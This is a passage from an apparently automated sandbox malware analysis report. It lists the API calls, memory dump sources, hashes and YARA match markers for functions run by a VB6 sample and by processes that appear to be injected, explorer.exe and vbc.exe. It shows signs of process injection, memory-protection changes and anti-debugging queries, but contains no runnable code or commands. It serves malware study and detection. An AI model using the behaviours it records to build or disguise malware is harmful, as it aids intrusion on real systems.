__vbaFreeVar.MSVBVM60 ref: 00425F37
__vbaNew2.MSVBVM60(004101D0,004273B8), ref: 00425F4F
__vbaHresultCheckObj.MSVBVM60(00000000,0264E7AC,004101C0,0000001C), ref: 00425F74
__vbaHresultCheckObj.MSVBVM60(00000000,?,004103F8,00000064), ref: 00425F9A
__vbaFreeObj.MSVBVM60 ref: 00425FA3

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#525#535#593MoveNew2
String ID:
API String ID: 2994127798-0
Opcode ID: 52b884b9859f3055d67440ade31f15dce4d155336a52be05c94a9c4744b697f7
Instruction ID: ae5cebbd9c7c5f0da9612d05b6b27074cc466098a05ea41c45391ca5a5075b43
Opcode Fuzzy Hash: 52b884b9859f3055d67440ade31f15dce4d155336a52be05c94a9c4744b697f7
Instruction Fuzzy Hash: 4F31A670E40214EBCB10DFA4EE49ADEBBB8EB48701F608016F941F71A0DB741545CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425D30, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425D83
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425DA2
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425DBE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425DD7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004102F0,00000048), ref: 00425DF4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410250,000001EC), ref: 00425E34
__vbaFreeStr.MSVBVM60 ref: 00425E3D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00425E4D

Strings

~-, xrefs: 00425D67, 00425D79, 00425D89, 00425DA6, 00425DB4, 00425DC4

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID: ~-
API String ID: 2509323985-862951423
Opcode ID: e152cfffb0066e1da10bdd83013879c67b7478e549004e5506de9c0141304546
Instruction ID: cd614f7c1f4906d8bcf114684dcfd2bfa90c1d303a04a6707c002dbff61e76dc
Opcode Fuzzy Hash: e152cfffb0066e1da10bdd83013879c67b7478e549004e5506de9c0141304546
Instruction Fuzzy Hash: 44316DB4A00214AFCB10DFA8DC49F9EBBB8FB48700F10856AF545F7251D77899468FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00425600, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425647
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425666
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425682
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042569B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410284,00000198), ref: 004256BE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410250,000001EC), ref: 004256FE
__vbaFreeStr.MSVBVM60 ref: 00425707
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00425717

Strings

~-, xrefs: 00425629, 0042563D, 0042564D, 0042566A, 00425678, 00425688

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID: ~-
API String ID: 2509323985-862951423
Opcode ID: 8ad10268dff50bf50ca5c09dc90de459eedb1d649fdafa5bbe5d202fad9c9140
Instruction ID: 0c65233708a6eac0cc042270edeb3f50b68ea7afcdb498877642a83c36abf4f6
Opcode Fuzzy Hash: 8ad10268dff50bf50ca5c09dc90de459eedb1d649fdafa5bbe5d202fad9c9140
Instruction Fuzzy Hash: 4E317EB4A40214AFCB14DFA8DC49FAE7BB8FB48701F50843AF545F7250D67899468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00426000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00401816), ref: 00426043
__vbaNew2.MSVBVM60(0040E098, ~-,?,?,?,?,?,?,?,?,00401816), ref: 0042605C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401816), ref: 00426075
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004102E0,000001B8,?,?,?,?,?,?,?,?,00401816), ref: 00426098
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401816), ref: 004260A1
__vbaFreeStr.MSVBVM60(004260C2,?,?,?,?,?,?,?,?,00401816), ref: 004260BB

Strings

~-, xrefs: 00426049, 00426052, 00426062

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyHresultNew2
String ID: ~-
API String ID: 4138333463-862951423
Opcode ID: efec45d4ff046ac7f1cec7c03f3c65b436cbaf8f8609552f174d89e4b2ef3572
Instruction ID: e9f13862d89bc6af8c487155fd1b9902c4794aa6359eb390f22ab550fbed7fb4
Opcode Fuzzy Hash: efec45d4ff046ac7f1cec7c03f3c65b436cbaf8f8609552f174d89e4b2ef3572
Instruction Fuzzy Hash: F4118170A40204ABCB10DFA4DD49E9EBBB8FF48700F208426F541E32A0C7785546CB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 2288 Parent PID: 552 explorer.exeCOMMON

Executed Functions

Function 03E11D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03E0CB87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03E0CB87,007A002E,00000000,00000060,00000000,00000000), ref: 03E11DAD

Strings

.z`, xrefs: 03E11D9D, 03E11DA8

Memory Dump Source

Source File: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Offset: 03DA0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 3c7128878d46b9c339098fdbe9645c950ca89f4ddbdfc9e955e3e4b3f25d1afc
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F2F0B2B2200208ABCB08CF88DC84EEB77EDAF8C754F158248BA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03E11E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03E0CD42,5EB6522D,FFFFFFFF,03E0CA01,?,?,03E0CD42,?,03E0CA01,FFFFFFFF,5EB6522D,03E0CD42,?,00000000), ref: 03E11E55

Memory Dump Source

Source File: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Offset: 03DA0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1ed91fff89dbd062650fe76479a50833b72fef41568bd39a94173fdfa13e5f40
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 63F0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158648BA1DA7241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03E12070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03DFBAF8), ref: 03E1209D

Strings

.z`, xrefs: 03E1208C, 03E12098

Memory Dump Source

Source File: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Offset: 03DA0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c928353c486c7f954093765b29b3d19077c0c255073708e5a4fbf61edb37e314
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 1EE01AB52002086BD714DF59CC44EA777ACEF88650F014554BA185B241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 03E120E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03E12134

Memory Dump Source

Source File: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Offset: 03DA0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 99e6a4103c2b39eceada57d47f8633e520f317be867cca8dac9c0a2af1a423ae
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: F401AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03E12030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03E0C506,?,03E0CC7F,03E0CC7F,?,03E0C506,?,?,?,?,?,00000000,00000000,?), ref: 03E1205D

Memory Dump Source

Source File: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Offset: 03DA0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: a0928e43773c4cdc32b29ea1950b8642b373e8571676eb373a764feda7d1276f
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 5FE012B5200208ABDB14EF99CC80EA777ACEF88650F118558BA186B241C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 1756 Parent PID: 2464 vbc.exe COMMON

Executed Functions

Function 001B906B, Relevance: 2.1, APIs: 1, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 93f044fc23b161b76a6416fd3892586b71c4f3d220073f9374268a1ffe34090a
Instruction ID: 562040de9dd19e26e34836e856b656faf838e94925167e9a5e1bb6a7ca88ec60
Opcode Fuzzy Hash: 93f044fc23b161b76a6416fd3892586b71c4f3d220073f9374268a1ffe34090a
Instruction Fuzzy Hash: E9227B70644305DFEF289F24CC95BE97BA1AF22310F65825AFE968B1D2C3758887D712

Uniqueness

Uniqueness Score: -1.00%

Function 001B9F63, Relevance: 1.6, APIs: 1, Instructions: 132nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 4bcab73b07c69d6359c4ee051dc6f074582498bd4145fd9ef65f446b7471857c
Instruction ID: fc3ddc34951fbd4eb3d70e48dbf5104b524ba84fcc9eb70cad59d71e8c28fbbd
Opcode Fuzzy Hash: 4bcab73b07c69d6359c4ee051dc6f074582498bd4145fd9ef65f446b7471857c
Instruction Fuzzy Hash: 48411D31204701CEEF3D5E58C6943F933A2EF56350FEA8269DD4286894DB798989D643

Uniqueness

Uniqueness Score: -1.00%

Function 001B9F5D, Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e40c6e322bc62e40d4da0a802a4f8ed5545caade4daf9460213e51b9a8e703da
Instruction ID: e72dc03f40397fbdd035a75007cf22c3708771c57116c8b6401fe5b979eb3b23
Opcode Fuzzy Hash: e40c6e322bc62e40d4da0a802a4f8ed5545caade4daf9460213e51b9a8e703da
Instruction Fuzzy Hash: E4314B30204301CEEF3D5A18C6983F536A2AF65360FF7826ADD4387894D77989C9A643

Uniqueness

Uniqueness Score: -1.00%

Function 001B9FAF, Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f006b4346447b4a9f9f4de5d7057b332f252d1e925341c966e999f0878372238
Instruction ID: 8a920be69b4fd8f7d5b9eae8724d97f213d2bdfb4480ba59e6194292512be5c9
Opcode Fuzzy Hash: f006b4346447b4a9f9f4de5d7057b332f252d1e925341c966e999f0878372238
Instruction Fuzzy Hash: 08410B31204701CEEF3D5E58C6987F933A2AF26350FEA8259DD8287894DB798989D743

Uniqueness

Uniqueness Score: -1.00%

Function 001B9FE8, Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e3c7d2334742dcc28d4c8505a3cf70f063fa554a990843a9b77450d6a13612d5
Instruction ID: c2ae0593e3e32f51109de77a48c561a3e5dd03c710728b108bc4fd6c73894040
Opcode Fuzzy Hash: e3c7d2334742dcc28d4c8505a3cf70f063fa554a990843a9b77450d6a13612d5
Instruction Fuzzy Hash: 70312C31604701CEEF3D5E54C6583F932A2AF26350FEB825ADD828B498DB79C989D743

Uniqueness

Uniqueness Score: -1.00%

Function 001BA0A4, Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 383be17dc4e00da8c767fd274718c08b4563b5f4d8f981fe76561281bb123654
Instruction ID: deb3fe8b9e50246e8d6c1ab7f0f222c97dcf235af490aac486d1418adb92bf26
Opcode Fuzzy Hash: 383be17dc4e00da8c767fd274718c08b4563b5f4d8f981fe76561281bb123654
Instruction Fuzzy Hash: 61314C25644B11CDEF3D0FA5C2483E926E6AF27750FEA8245CD828A8D8DF79C589D603

Uniqueness

Uniqueness Score: -1.00%

Function 001BA020, Relevance: 1.6, APIs: 1, Instructions: 112nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 19304075070d34c1c6325507815edd0d0caf6a858e2299e77830035d6c301ffd
Instruction ID: 706f53935c60b7717c9f6e154731117d5e69309831b0e4fcbc213f1866c86b81
Opcode Fuzzy Hash: 19304075070d34c1c6325507815edd0d0caf6a858e2299e77830035d6c301ffd
Instruction Fuzzy Hash: FD313D31204701CEDF3D4E58C6483F933A1AF12350FEB8259DD828A498D779C989D743

Uniqueness

Uniqueness Score: -1.00%

Function 001BA055, Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 0c2fb2a448a783f3b896bdc7035b73b363979efac70baf965f5ae2162c53f7ad
Instruction ID: 867d563642518af3d7f7982f1a1385e21d7f4bf4b8204c3323455172dc38647c
Opcode Fuzzy Hash: 0c2fb2a448a783f3b896bdc7035b73b363979efac70baf965f5ae2162c53f7ad
Instruction Fuzzy Hash: 40313C31204701CEEF3D4E58C6483F932A2AF22350FEB8259DD828A8D4DB79C989D643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA113, Relevance: 1.6, APIs: 1, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 9b243a93881ace9e9b701d6fbd5af706fef27766e2eae5388d14b816bb574ade
Instruction ID: c076ad75c360c469b64a8493f55f6c7cf57a55f8950545acad0e48b58eda4426
Opcode Fuzzy Hash: 9b243a93881ace9e9b701d6fbd5af706fef27766e2eae5388d14b816bb574ade
Instruction Fuzzy Hash: E431F935644701CDDB3D4F54C2883F526A2AF23760FEA8295DC828A898DB798AC9D643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA14B, Relevance: 1.6, APIs: 1, Instructions: 91nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: cc0401d90e61ae411bfaba5365d9443e4a985b5dc819c89c9855405ac38dafb7
Instruction ID: 6b840472d974b354ed7fac250729430089bd910bd18afb4c38d47ce73801fa71
Opcode Fuzzy Hash: cc0401d90e61ae411bfaba5365d9443e4a985b5dc819c89c9855405ac38dafb7
Instruction Fuzzy Hash: BD210831648711CDDB3D4F55C28C3F936A2AF23750FEEC295D8828A898DB79C989D643

Uniqueness

Uniqueness Score: -1.00%

Function 001B7EE5, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 68726c824f5061419d598986e59fe4138ff43ff21ea015004a7ad248f83f709b
Instruction ID: ec7d8c6c21fc05ecac664d3b858bb6150c71915ee8ff69b38b06d9fb2c34346f
Opcode Fuzzy Hash: 68726c824f5061419d598986e59fe4138ff43ff21ea015004a7ad248f83f709b
Instruction Fuzzy Hash: DB210D6820D101DEDB2CBA68CD90FFA12589F74B50F72892BF857871D5CF28C845E716

Uniqueness

Uniqueness Score: -1.00%

Function 001BA189, Relevance: 1.6, APIs: 1, Instructions: 86nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: ffce745c06df41f5f52da852c6c2b9dfb6fca843eefd5b68de0ec0fe439ee8e0
Instruction ID: 9d0238c4fec5e06f5bc55ffb356bf54d1d26e325976891f55e38249caba055c0
Opcode Fuzzy Hash: ffce745c06df41f5f52da852c6c2b9dfb6fca843eefd5b68de0ec0fe439ee8e0
Instruction Fuzzy Hash: 3C210A31644701DDDF3D4F54C28C3E532A2AF22350FEAC295DC828A898DB79CAC9D643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA1F4, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 47b6fe63ca1259f09273406f58aa9e63e23029639a4ca727725cd11666cc3e88
Instruction ID: 87a891841b236b814526ed97456001df7a8f3ea65228c356bc99a65fd2865b16
Opcode Fuzzy Hash: 47b6fe63ca1259f09273406f58aa9e63e23029639a4ca727725cd11666cc3e88
Instruction Fuzzy Hash: 7F21F961644701CDDB394F95C28C3E537A2AF23750FEFC295D8828A899DB78C98DD643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA1C3, Relevance: 1.6, APIs: 1, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 240156bcf2f4012db8e770e5e82117299aaca4b7ec4ebda04b273824071045e6
Instruction ID: a1585ffde9cc4a0f5db31b6e98f83d09718943f0bf77381583716f90a39ec7ba
Opcode Fuzzy Hash: 240156bcf2f4012db8e770e5e82117299aaca4b7ec4ebda04b273824071045e6
Instruction Fuzzy Hash: 0721F931644701DDDF395F94C28C3E533A2EF22360FEAC295D8824A898DB798A89D643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA234, Relevance: 1.6, APIs: 1, Instructions: 79nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 4d0b73a04d7cfae53e914fb702c7d5666244b204924499d1bdfcfa5bae71f8d0
Instruction ID: 0d780306b30fcdbb1c7baa56dbfad3474b65736f44c6e857940acf01d55c7170
Opcode Fuzzy Hash: 4d0b73a04d7cfae53e914fb702c7d5666244b204924499d1bdfcfa5bae71f8d0
Instruction Fuzzy Hash: E1210531644701CDDB395F94C28C3E933A2AF22350FEE8254D8828A898DB798A8DD643

Uniqueness

Uniqueness Score: -1.00%

Function 001BA27F, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 207dd93b402489385ac5bc734ac0cb566323ca53cd69fe47ab2ea393f286740d
Instruction ID: a531912805efe564968e6ce0bb42a0bb98ab48c3c88230b3a73d4ce139145624
Opcode Fuzzy Hash: 207dd93b402489385ac5bc734ac0cb566323ca53cd69fe47ab2ea393f286740d
Instruction Fuzzy Hash: 0A216B31648342CED7295FA4C2893E637B1AF13750FEE82D9DC914A89AD7748688D703

Uniqueness

Uniqueness Score: -1.00%

Function 001BA363, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1388d6bb8df6009b14902dccfcdf31392a9ea6c358f6c9aaad568868ff4892cc
Instruction ID: 6cc043e2f1ec00c19bf4d883c5415cae4c82d3db50fe96fb1b02e0a2b9143f86
Opcode Fuzzy Hash: 1388d6bb8df6009b14902dccfcdf31392a9ea6c358f6c9aaad568868ff4892cc
Instruction Fuzzy Hash: 6C11E92A294B128CDB391FE9D2883DD23A59E13B80BED4754DCD1D988CEF79850AC646

Uniqueness

Uniqueness Score: -1.00%

Function 001BA321, Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 804a45d9b6911cf291f8cb1896146cb20a6e6961ebf06b23612fad4fbf4f295d
Instruction ID: d94e2e6320760da267591687a1d97c74e54482886a434ba7d1a24d5e1d5fd368
Opcode Fuzzy Hash: 804a45d9b6911cf291f8cb1896146cb20a6e6961ebf06b23612fad4fbf4f295d
Instruction Fuzzy Hash: 01014C26284B118CDB2E1EE5D3483E92366DF57780FEE8250DCC2DA89CEB79464DD203

Uniqueness

Uniqueness Score: -1.00%

Function 001BA3D3, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 001BA426

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 8ae0d7d1e1210f48b37868fc315177b48640e4c4bf464ee890b1c0a40b5322af
Instruction ID: 87c7fbc6f1536dd5a7de7d30ce35acfe17d27ab1e7a68e8fcade2ea26fce345b
Opcode Fuzzy Hash: 8ae0d7d1e1210f48b37868fc315177b48640e4c4bf464ee890b1c0a40b5322af
Instruction Fuzzy Hash: 06F02826244B12CCDB2A2FA5D2483ED22A6AF13B80BED8644DCC19984CEF799509C302

Uniqueness

Uniqueness Score: -1.00%

Function 001B99F7, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,001B92BD,00000040,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B9A42

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 544d4303f947564569569d90b97faccc82f52902e72b36a24bd4330ae574969a
Instruction ID: ce5c8dbf5da39cfac66c769ca8f16859bcd826f787ba0fb66430af061ae925c5
Opcode Fuzzy Hash: 544d4303f947564569569d90b97faccc82f52902e72b36a24bd4330ae574969a
Instruction Fuzzy Hash: F9E02BA64E4B104CAE111EF9DA0470E37A9C993E54768C354A5E0EC4CCEF34D0028559

Uniqueness

Uniqueness Score: -1.00%

Function 001B9A29, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,001B92BD,00000040,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B9A42

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

